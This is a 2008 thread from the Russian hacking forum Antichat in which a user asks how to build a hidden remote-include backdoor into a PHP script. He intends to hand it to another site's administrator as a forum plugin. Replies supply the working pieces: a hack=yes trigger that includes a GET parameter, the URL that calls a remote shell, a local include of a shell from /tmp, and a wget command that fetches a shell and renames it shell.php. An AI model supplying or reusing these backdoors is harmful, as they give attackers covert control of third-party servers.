ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2491  
Старый 30.03.2008, 07:14
Аватар для QZAR-X
QZAR-X
Новичок
Регистрация: 14.02.2008
Сообщений: 13
Провел на форуме:
54867

Репутация: 5
По умолчанию

У меня есть php скрипт, мне в нем надо сделать что-то тиап уязвимости, т.е. я мог вызвать через этот скрипт шелл:
например: www.site.com/script.php?shell=[shell-adress]
 
Ответить с цитированием

  #2492  
Старый 30.03.2008, 09:13
Аватар для QZAR-X
QZAR-X
Новичок
Регистрация: 14.02.2008
Сообщений: 13
Провел на форуме:
54867

Репутация: 5
По умолчанию

Цитата:
Сообщение от [x26]VOLAND  
PHP код:
...
$shell = @$_GET['shell'];
include(
$shell);
... 
так не идет...
мне не надо чтобы скрипт постояно инклудил, а когда мне нужно, а то если переменная shell не задана, то вываливает ошибка.
 
Ответить с цитированием

  #2493  
Старый 30.03.2008, 09:27
Аватар для heks
heks
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме:
1484154

Репутация: 126
Отправить сообщение для heks с помощью ICQ
По умолчанию

вставляешь в страницу вот это
if(@$_GET["hack"] == "yes") include($_GET['file']);

а вызываешь вот так

http://site.ru/index.php?hack=yes&file=http://site.ru/shell.txt
 
Ответить с цитированием

  #2494  
Старый 30.03.2008, 09:43
Аватар для QZAR-X
QZAR-X
Новичок
Регистрация: 14.02.2008
Сообщений: 13
Провел на форуме:
54867

Репутация: 5
По умолчанию

Warning: include() [function.include]: URL file-access is disabled in the server configuration

Вот такую ошибку нельзя обойти или это только в конфигах меняется?
 
Ответить с цитированием

  #2495  
Старый 30.03.2008, 10:06
Аватар для QZAR-X
QZAR-X
Новичок
Регистрация: 14.02.2008
Сообщений: 13
Провел на форуме:
54867

Репутация: 5
По умолчанию

Цитата:
Сообщение от [x26]VOLAND  
Вот теперь понятно. В настройках PHP отключена опция allow_url_include
Обойти её в большинстве случев нельзя, надо просить хостера включить (сам просил, всегда прокатывало).
это что при выключенном параметре, невозможен php-инклудинг?
З.Ы. я этот скрипт хочу не себе поставить, поэтому я должен быть готов на все случаи жизни=), шелл я подсунуть не могу уж слишком он громоздкий, спалят...

Последний раз редактировалось QZAR-X; 30.03.2008 в 10:10..
 
Ответить с цитированием

  #2496  
Старый 30.03.2008, 10:11
Аватар для heks
heks
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме:
1484154

Репутация: 126
Отправить сообщение для heks с помощью ICQ
По умолчанию

да невозможен и ничего ты несделаешь с удаленного сервера шел не приинклудишь а вот с того сервера котором ты находится должен смоч приинклудить попробуй с локального сервера шел приинклудить.
Попробуй залить в папку /tmp шел а потом вставь в скрипт что то типо этого
<?
include ("/tmp/shell.txt")
?>

Последний раз редактировалось heks; 30.03.2008 в 10:14..
 
Ответить с цитированием

  #2497  
Старый 30.03.2008, 10:17
Аватар для QZAR-X
QZAR-X
Новичок
Регистрация: 14.02.2008
Сообщений: 13
Провел на форуме:
54867

Репутация: 5
По умолчанию

я щас экспрементирую на своем компе, а я хочу админу одного сайта дать плагин для forum'a в котором будет удаленный инклуд. Я незнаю разрешено ли на том серваке по url инклудить, поэтому отрабатываю разные случаи.
Тогда можно ли сделать, коммандой 1.php?shell=conf.php, файл(локальный) просто прочитался или скачался?



А можно чтобы вместо инклуда, была заливка файла на сервер и вызов был примерно таков:
index.php?hack=yes&upload=shell.php

Последний раз редактировалось QZAR-X; 30.03.2008 в 10:26..
 
Ответить с цитированием

  #2498  
Старый 30.03.2008, 10:49
Аватар для heks
heks
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме:
1484154

Репутация: 126
Отправить сообщение для heks с помощью ICQ
По умолчанию

Цитата:
Сообщение от QZAR-X  
я щас экспрементирую на своем компе, а я хочу админу одного сайта дать плагин для forum'a в котором будет удаленный инклуд. Я незнаю разрешено ли на том серваке по url инклудить, поэтому отрабатываю разные случаи.
Тогда можно ли сделать, коммандой 1.php?shell=conf.php, файл(локальный) просто прочитался или скачался?



А можно чтобы вместо инклуда, была заливка файла на сервер и вызов был примерно таков:
index.php?hack=yes&upload=shell.php

встрой туда что я тебе сказал и все будет возможно использовать можно будет какой либо качалкой залить с удаленного сайта шел примерно так сам точно незнаю скрипт в котором это было где то есть но я непомню где ;(
wget http://site.ru/shell.txt;mv shell.txt shell.php но дира должна быть доступна для записи
 
Ответить с цитированием

  #2499  
Старый 30.03.2008, 10:50
Аватар для azote
azote
Новичок
Регистрация: 28.03.2008
Сообщений: 24
Провел на форуме:
52770

Репутация: -5
По умолчанию

Может поможет мне ктонить? А? Мой пост несколько страниц назад...
 
Ответить с цитированием

  #2500  
Старый 30.03.2008, 10:58
Аватар для heks
heks
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме:
1484154

Репутация: 126
Отправить сообщение для heks с помощью ICQ
По умолчанию

Цитата:
Сообщение от azote  
Может поможет мне ктонить? А? Мой пост несколько страниц назад...
сразу сказать на какой странице твой пост нельзя у лююдей траф не резиновый непроше юзать шел который скачивае или отправляет шел по почте ?

Последний раз редактировалось heks; 30.03.2008 в 11:02..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[c/c++] Новичкам: задаем вопросы _Great_ С/С++, C#, Delphi, .NET, Asm 5420 17.06.2010 13:33
Интернетчики задали российскому президенту очень странные вопросы podkashey Мировые новости 4 07.07.2006 16:53
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ